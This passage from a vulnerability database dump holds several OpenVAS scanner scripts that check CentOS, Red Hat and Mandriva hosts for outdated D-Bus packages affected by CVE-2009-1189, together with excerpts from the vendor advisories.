PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\n not correctly fix the denial of service flaw in the system for sending\n messages between applications. A local user could use this flaw to send a\n message with a malformed signature to the bus, causing the bus (and,\n consequently, any process using libdbus to receive messages) to abort.\n (CVE-2009-1189)\n \n Note: Users running any application providing services over the system\n message bus are advised to test this update carefully before deploying it\n in production environments.\n \n All users are advised to upgrade to these updated packages, which contain a\n backported patch to correct this issue. 
For the update to take effect, all\n running instances of dbus-daemon and all running applications using the\n libdbus library must be restarted, or the system rebooted.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"dbus on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-January/016433.html\");\n script_id(880595);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0018\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2008-3834\");\n script_name(\"CentOS Update for dbus CESA-2010:0018 centos5 i386\");\n\n script_summary(\"Check for the Version of dbus\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", 
rpm:\"dbus-devel~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-libs\", rpm:\"dbus-libs~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256.", "modified": "2017-07-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65733", "href": "http://plugins.openvas.org/nasl.php?oid=65733", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:256 (dbus)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_256.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:256 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in dbus:\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic\nto validate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix\nfor CVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nAffected: 2008.1, 2009.0, Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256.\";\n\n \n\nif(description)\n{\n script_id(65733);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:256 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256-1.", "modified": "2018-04-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:136141256231066422", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066422", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:256-1 (dbus)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_256_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:256-1 (dbus)\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in dbus:\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic\nto validate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix\nfor CVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nUpdate:\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256-1\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256-1.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66422\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:256-1 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"libdbus-1_3-devel\", rpm:\"libdbus-1_3-devel~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3-devel\", rpm:\"lib64dbus-1_3-devel~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "The remote host is missing an update for the 'dbus' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880595", "type": "openvas", "title": "CentOS Update for dbus CESA-2010:0018 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus CESA-2010:0018 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-January/016433.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880595\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2010:0018\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2008-3834\");\n script_name(\"CentOS Update for dbus CESA-2010:0018 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dbus'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"dbus on CentOS 5\");\n script_tag(name:\"insight\", value:\"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\n not correctly fix the denial of service flaw in the system for sending\n messages between applications. 
A local user could use this flaw to send a\n message with a malformed signature to the bus, causing the bus (and,\n consequently, any process using libdbus to receive messages) to abort.\n (CVE-2009-1189)\n\n Note: Users running any application providing services over the system\n message bus are advised to test this update carefully before deploying it\n in production environments.\n\n All users are advised to upgrade to these updated packages, which contain a\n backported patch to correct this issue. For the update to take effect, all\n running instances of dbus-daemon and all running applications using the\n libdbus library must be restarted, or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-libs\", rpm:\"dbus-libs~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2018-01-23T13:05:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "Check for the Version of dbus", "modified": "2018-01-23T00:00:00", "published": 
"2010-01-15T00:00:00", "id": "OPENVAS:1361412562310870201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870201", "type": "openvas", "title": "RedHat Update for dbus RHSA-2010:0018-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dbus RHSA-2010:0018-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\n not correctly fix the denial of service flaw in the system for sending\n messages between applications. 
A local user could use this flaw to send a\n message with a malformed signature to the bus, causing the bus (and,\n consequently, any process using libdbus to receive messages) to abort.\n (CVE-2009-1189)\n \n Note: Users running any application providing services over the system\n message bus are advised to test this update carefully before deploying it\n in production environments.\n \n All users are advised to upgrade to these updated packages, which contain a\n backported patch to correct this issue. For the update to take effect, all\n running instances of dbus-daemon and all running applications using the\n libdbus library must be restarted, or the system rebooted.\";\n\ntag_affected = \"dbus on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-January/msg00003.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870201\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0018-01\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2008-3834\");\n script_name(\"RedHat Update for dbus RHSA-2010:0018-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-debuginfo\", rpm:\"dbus-debuginfo~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-libs\", rpm:\"dbus-libs~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256-1.", "modified": "2017-07-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:66422", "href": "http://plugins.openvas.org/nasl.php?oid=66422", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:256-1 (dbus)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_256_1.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:256-1 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# 
Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in dbus:\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic\nto validate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix\nfor CVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nUpdate:\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256-1\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256-1.\";\n\n \n\nif(description)\n{\n script_id(66422);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:256-1 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3-devel\", 
